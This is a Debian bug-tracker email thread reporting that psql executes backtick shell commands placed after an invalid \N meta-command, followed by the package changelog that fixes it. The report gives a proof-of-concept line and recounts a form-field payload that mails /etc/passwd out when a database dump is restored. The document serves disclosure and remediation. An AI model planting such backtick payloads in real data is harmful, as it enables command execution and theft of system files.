Your message dated Tue, 07 Jun 2005 06:47:43 -0400
with message-id <[EMAIL PROTECTED]>
and subject line Bug#285844: fixed in postgresql-8.0 8.0.3-4
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--------------------------------------
Received: (at submit) by bugs.debian.org; 15 Dec 2004 22:01:58 +0000
>From [EMAIL PROTECTED] Wed Dec 15 14:01:58 2004
Return-path: <[EMAIL PROTECTED]>
Received: from thomer.lcs.mit.edu (dataloss.thomer.com) [18.26.4.214]
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1CehDa-0007rV-00; Wed, 15 Dec 2004 14:01:58 -0800
Received: from thomer by dataloss.thomer.com with local (Exim 3.36 #1 (Debian))
id 1CehD2-0007Wx-00; Wed, 15 Dec 2004 17:01:24 -0500
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: "Thomer M. Gil" <[EMAIL PROTECTED]>
To: Debian Bug Tracking System <[EMAIL PROTECTED]>
Subject: postgresql: syntax error will cause data to be executed in shell
X-Mailer: reportbug 3.4
Date: Wed, 15 Dec 2004 17:01:23 -0500
Message-Id: <[EMAIL PROTECTED]>
Sender: "Thomer M. Gil" <[EMAIL PROTECTED]>
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2004_03_25
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE
autolearn=no version=2.60-bugs.debian.org_2004_03_25
X-Spam-Level:
Package: postgresql
Version: 7.4.6-5
Severity: important
Running psql on a file with the following contents:
\N `touch cause.bug.to.happen`
will create the file 'cause.bug.to.happen'. \N is not a valid meta-command,
but psql will execute the command between `` nonetheless. This can actually
result in serious security problems, as illustrated below.
As it happens, \N is the representation of a NULL value. Take, for example,
the following chunk of SQL:
CREATE TABLE t (
a varchar(32),
c TEXT,
b varchar(32)
);
COPY t (a, b, c)
a \N `touch bug.happened`
\.
To illustrate the example, "FROM stdin;" is missing from the COPY command. This
causes the parser to choke. What was supposed to be data is now executed in a
shell.
This problem can occur when psql restores a database using a dump file that was
generated by an incompatible (older version) pg_dump.
This is not a theoretical problem. We've had this problem occurring when a
tester joker wrote `mail /etc/passwd < [EMAIL PROTECTED] (including
backticks) in a form field on some web application. Months later, when running
pg_dump on the server and psql on some other machine to restore the database,
that email was actually sent to the tester.
Maybe I don't fully understand the problem, but it seems that the parser should
ignore everything that comes after an invalid meta-command, like \N.
-- System Information:
Debian Release: 3.1
APT prefers unstable
APT policy: (500, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.6.9
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Versions of packages postgresql depends on:
ii adduser 3.59 Add and remove users and groups
ii debconf [debconf 1.4.41 Debian configuration management sy
ii debianutils 2.11.0 Miscellaneous utilities specific t
ii libc6 2.3.2.ds1-19 GNU C Library: Shared libraries an
ii libcomerr2 1.35-8 The Common Error Description libra
ii libkrb53 1.3.5-1 MIT Kerberos runtime libraries
ii libpam0g 0.76-22 Pluggable Authentication Modules l
ii libperl5.8 5.8.4-5 Shared Perl library
ii libpq3 7.4.6-5 PostgreSQL C client library
ii libreadline4 4.3-15 GNU readline and history libraries
ii libssl0.9.7 0.9.7e-2 SSL shared libraries
ii mailx 1:8.1.2-0.20040524cvs-3 A simple mail user agent
ii postgresql-clien 7.4.6-5 front-end programs for PostgreSQL
ii procps 1:3.2.4-1 The /proc file system utilities
ii python2.3 2.3.4-18 An interactive high-level object-o
ii ucf 1.13 Update Configuration File: preserv
ii zlib1g 1:1.2.2-4 compression library - runtime
-- debconf information:
* postgresql/initdb/location: /var/lib/postgres/data
postgresql/upgrade/preserve_location: $PGDATA/..
* postgresql/settings/day_month_order: US
postgresql/upgrade/policy: true
* postgresql/settings/locale: C
postgresql/enable_lang: true
* postgresql/purge_data_too: false
postgresql/very_old_version_warning: true
postgresql/upgrade/dump_location: $PGDATA/..
* postgresql/settings/encoding: per_locale
postgresql/convert-pg_hba.conf: true
---------------------------------------
Received: (at 285844-close) by bugs.debian.org; 7 Jun 2005 10:51:37 +0000
>From [EMAIL PROTECTED] Tue Jun 07 03:51:37 2005
Return-path: <[EMAIL PROTECTED]>
Received: from newraff.debian.org [208.185.25.31] (mail)
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1DfbgH-0000KA-00; Tue, 07 Jun 2005 03:51:37 -0700
Received: from katie by newraff.debian.org with local (Exim 3.35 1 (Debian))
id 1DfbcV-0004eq-00; Tue, 07 Jun 2005 06:47:43 -0400
From: Martin Pitt <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.56 $
Subject: Bug#285844: fixed in postgresql-8.0 8.0.3-4
Message-Id: <[EMAIL PROTECTED]>
Sender: Archive Administrator <[EMAIL PROTECTED]>
Date: Tue, 07 Jun 2005 06:47:43 -0400
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level:
X-CrossAssassin-Score: 5
Source: postgresql-8.0
Source-Version: 8.0.3-4
We believe that the bug you reported is fixed in the latest version of
postgresql-8.0, which is due to be installed in the Debian FTP archive:
libecpg-compat1_8.0.3-4_i386.deb
to pool/main/p/postgresql-8.0/libecpg-compat1_8.0.3-4_i386.deb
libecpg-dev_8.0.3-4_i386.deb
to pool/main/p/postgresql-8.0/libecpg-dev_8.0.3-4_i386.deb
libecpg4_8.0.3-4_i386.deb
to pool/main/p/postgresql-8.0/libecpg4_8.0.3-4_i386.deb
libpgtypes1_8.0.3-4_i386.deb
to pool/main/p/postgresql-8.0/libpgtypes1_8.0.3-4_i386.deb
libpq-dev_8.0.3-4_i386.deb
to pool/main/p/postgresql-8.0/libpq-dev_8.0.3-4_i386.deb
libpq4_8.0.3-4_i386.deb
to pool/main/p/postgresql-8.0/libpq4_8.0.3-4_i386.deb
postgresql-8.0_8.0.3-4.diff.gz
to pool/main/p/postgresql-8.0/postgresql-8.0_8.0.3-4.diff.gz
postgresql-8.0_8.0.3-4.dsc
to pool/main/p/postgresql-8.0/postgresql-8.0_8.0.3-4.dsc
postgresql-8.0_8.0.3-4_i386.deb
to pool/main/p/postgresql-8.0/postgresql-8.0_8.0.3-4_i386.deb
postgresql-client-8.0_8.0.3-4_i386.deb
to pool/main/p/postgresql-8.0/postgresql-client-8.0_8.0.3-4_i386.deb
postgresql-contrib-8.0_8.0.3-4_i386.deb
to pool/main/p/postgresql-8.0/postgresql-contrib-8.0_8.0.3-4_i386.deb
postgresql-doc-8.0_8.0.3-4_all.deb
to pool/main/p/postgresql-8.0/postgresql-doc-8.0_8.0.3-4_all.deb
postgresql-plperl-8.0_8.0.3-4_i386.deb
to pool/main/p/postgresql-8.0/postgresql-plperl-8.0_8.0.3-4_i386.deb
postgresql-plpython-8.0_8.0.3-4_i386.deb
to pool/main/p/postgresql-8.0/postgresql-plpython-8.0_8.0.3-4_i386.deb
postgresql-pltcl-8.0_8.0.3-4_i386.deb
to pool/main/p/postgresql-8.0/postgresql-pltcl-8.0_8.0.3-4_i386.deb
postgresql-server-dev-8.0_8.0.3-4_i386.deb
to pool/main/p/postgresql-8.0/postgresql-server-dev-8.0_8.0.3-4_i386.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Martin Pitt <[EMAIL PROTECTED]> (supplier of updated postgresql-8.0 package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.7
Date: Tue, 7 Jun 2005 12:15:43 +0200
Source: postgresql-8.0
Binary: libecpg4 postgresql-client-8.0 postgresql-plperl-8.0 postgresql-doc-8.0
postgresql-pltcl-8.0 libpq-dev libpq4 postgresql-plpython-8.0
postgresql-contrib-8.0 libpgtypes1 postgresql-server-dev-8.0 libecpg-compat1
postgresql-8.0 libecpg-dev
Architecture: source i386 all
Version: 8.0.3-4
Distribution: unstable
Urgency: low
Maintainer: Martin Pitt <[EMAIL PROTECTED]>
Changed-By: Martin Pitt <[EMAIL PROTECTED]>
Description:
libecpg-compat1 - older version of run-time library for ECPG programs
libecpg-dev - development files for ECPG (Embedded PostgreSQL for C)
libecpg4 - run-time library for ECPG programs
libpgtypes1 - shared library libpgtypes.so.1 for PostgreSQL 8.0
libpq-dev - header files for libpq4 (PostgreSQL library)
libpq4 - PostgreSQL C client library
postgresql-8.0 - object-relational SQL database, version 8.0 server
postgresql-client-8.0 - front-end programs for PostgreSQL 8.0
postgresql-contrib-8.0 - additional facilities for PostgreSQL
postgresql-doc-8.0 - documentation for the PostgreSQL database management
system
postgresql-plperl-8.0 - PL/Perl procedural language for PostgreSQL 8.0
postgresql-plpython-8.0 - PL/Python procedural language for PostgreSQL 8.0
postgresql-pltcl-8.0 - PL/TCL procedural language for PostgreSQL 8.0
postgresql-server-dev-8.0 - development files for PostgreSQL 8.0 server-side
programming
Closes: 139389 239811 243781 262081 264603 274043 277757 280417 280418 285844
285929 290118 290399 291350 302368 303257 304459 305200 305886 311553
Changes:
postgresql-8.0 (8.0.3-4) unstable; urgency=low
.
* First unstable upload.
* debian/control: Now build with libreadline5-dev instead of version 4.
.
postgresql-8.0 (8.0.3-3) experimental; urgency=low
.
* Added libpq4 dependency to libpq-dev.
* postgresql-contrib-8.0.install: Correct paths to install missing shared
files and documentation. (Closes: #311553)
* libpq-dev.install: Install some more header files from server/ which are
required by client libraries.
.
postgresql-8.0 (8.0.3-2) experimental; urgency=low
.
* Added CAN numbers to previous changelog entries.
* debian/patches/07-postgresql.conf.patch: Enable listen_addresses = '*' by
default.
* debian/control, libpq-dev: Conflict to and replace postgresql-dev.
.
postgresql-8.0 (8.0.3-1) experimental; urgency=low
.
* New upstream release:
- Prevent calling conversion functions by users. [CAN-2005-1409]
- Prevent calling tsearch2 functions by users. [CAN-2005-1410]
* debian/libpq-dev.{install,links}: Install pg_config into
/usr/lib/postgresql/8.0/bin to make it print correct paths, and install a
symlink into /usr/bin instead. Closes: #305200
* debian/rules: Change include dir configure option to
/usr/include/postgresql/8.0, so that different versions of
postgresql-server-dev-<version> do not conflict with each other. Since
applications using the libpq-dev are supposed to use pg_config, this
should not break them either.
.
postgresql-8.0 (8.0.2-1) experimental; urgency=low
.
* New upstream release:
- Removed debian/patches/02-libpq-soname.patch, upstream adopted SONAME
change to libpq4.
* Ship "reindexdb" in -contrib.
* Added debian/patches/02_pager.patch: Use /usr/bin/pager as default pager
in psql. Closes: #304459
* Added debian/postgresql-doc-8.0.doc-base: Register doc package in
doc-base.
.
postgresql-8.0 (8.0.1-4) experimental; urgency=low
.
* Ship pg_config in libpq-dev instead of postgresql-8.0; added
proper package conflict. Closes: #303257
* Install pg_config in /usr/bin instead of 8.0-specific bin dir.
Closes: #302368
* debian/postgresql-8.0.init: Added autovacuum functions.
.
postgresql-8.0 (8.0.1-3) experimental; urgency=low
.
* Dropped pgxs package, the Makefiles are now part of postgresql-server-dev.
* -contrib: Only recommend, not depend on libpg-perl and libdbd-pg-perl.
* Renamed packages pg-pl*-8.0 to postgresql-pl*-8.0 for consistency.
* Added debian/patches/07-postgresql.conf.patch:
- Patch for Debian changes to the default configuration.
- Enable stats_row_level to allow pg_autovacuum to work.
.
postgresql-8.0 (8.0.1-2) experimental; urgency=low
.
* Changed dependency of pg-pltcl-8.0 from libtcl8.4 to tcl8.4
* Now depend on postgresql-common >= 3 which provides more maintainer script
functions.
* Compress manpages.
.
postgresql-8.0 (8.0.1-1) experimental; urgency=low
.
* New upstream release. Closes: #274043, #291350
- Ignores shell backticks with invalid meta-commands. Closes: #285844
- Fixes uninitialized error strings when connecting to a server which is
down. Closes: #264603, #277757
- configure script supports GNU/Hurd and GNU/k*BSD. Closes: #262081
- Fixes comma splices in HTML documentation. Closes: #243781
- Now upper() and lower() work also for Unicode characters.
Closes: #139389, #290118, #290399
- New configuration variable max_stack_depth which prevents DoS situations
due to infinite recursion. Closes: #239811
- Reportedly works with Turkish locale. Closes: #305886
- This version is not vulnerable against the following security issues:
. Load arbitrary shared libs, execute startup function [CAN-2005-0227]
. Execute functions with aggregate wrapper [CAN-2005-0244]
. Buffer overflow and 64-bit issues in contrib/intagg [CAN-2005-0246]
. Buffer overflows in the PL/PGSQL parser in gram.y [CAN-2005-0247]
. Insecure temporary files in make_oidjoins_check [CAN-2004-0977]
* Splitted development package into libpq-dev and postgresql-server-dev.
Closes: #280417
* Splitted libecpg4 into libecpg4, libecpg-compat1 and libpgtypes1.
* Old libpgtcl package does not exist any more. The PL/TCL procedural
language is now shipped in pg-pltcl8.0, the TCL client library is not
shipped by PostgreSQL any more. Closes: #280418
* Now use /var/lib/postgresql/ as (default) data directory. Closes: #285929
Files:
bb19dee8ae736c6304e13519e1bfe264 1081 misc optional postgresql-8.0_8.0.3-4.dsc
475a3b6e00ea55cdb9bc42fe4ddda9f0 17078 misc optional
postgresql-8.0_8.0.3-4.diff.gz
bb8e0293edb509fc456127320ac65480 1263770 doc optional
postgresql-doc-8.0_8.0.3-4_all.deb
4676ce93ffe3f663b9a1a8a60d06f22a 3997654 misc optional
postgresql-8.0_8.0.3-4_i386.deb
0368ab7784d68b4f5c58fe3d61f35045 1165544 misc optional
postgresql-client-8.0_8.0.3-4_i386.deb
7080c62a3da255d674239153c019ace4 160748 libdevel optional
libpq-dev_8.0.3-4_i386.deb
bf044bdc17782b8cd86428a37136f90c 426408 libdevel optional
postgresql-server-dev-8.0_8.0.3-4_i386.deb
8d5bd939646086204bb532cdabec454b 116856 libs optional libpq4_8.0.3-4_i386.deb
a8a1d77e4fcbc4aa1218562088a1c445 6462 libs optional libecpg4_8.0.3-4_i386.deb
f161939479fb816765669e7a5c57285e 189624 libdevel optional
libecpg-dev_8.0.3-4_i386.deb
327fa8f8042d005739c15e90e3fc3896 6474 libs optional
libecpg-compat1_8.0.3-4_i386.deb
77f3ad92c9ec621e883963981ee5616e 6446 libs optional
libpgtypes1_8.0.3-4_i386.deb
bb1a84abe20d506a726669746a5ab5eb 489722 misc optional
postgresql-contrib-8.0_8.0.3-4_i386.deb
0271dc158337dea1388f9056ae3ee0b8 26792 misc optional
postgresql-plperl-8.0_8.0.3-4_i386.deb
9905ec7c981b98b3e26f422038ea0111 22376 misc optional
postgresql-plpython-8.0_8.0.3-4_i386.deb
3337820f9fe80cdc14b59a12f995ea22 24168 misc optional
postgresql-pltcl-8.0_8.0.3-4_i386.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)
iD8DBQFCpXf+DecnbV4Fd/IRAo2FAKD2Ss2wQJsLnnnmPkySJ3FbhwZXNwCePit0
iWIBtVEDnEZYKRlixc7K92M=
=egmE
-----END PGP SIGNATURE-----
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
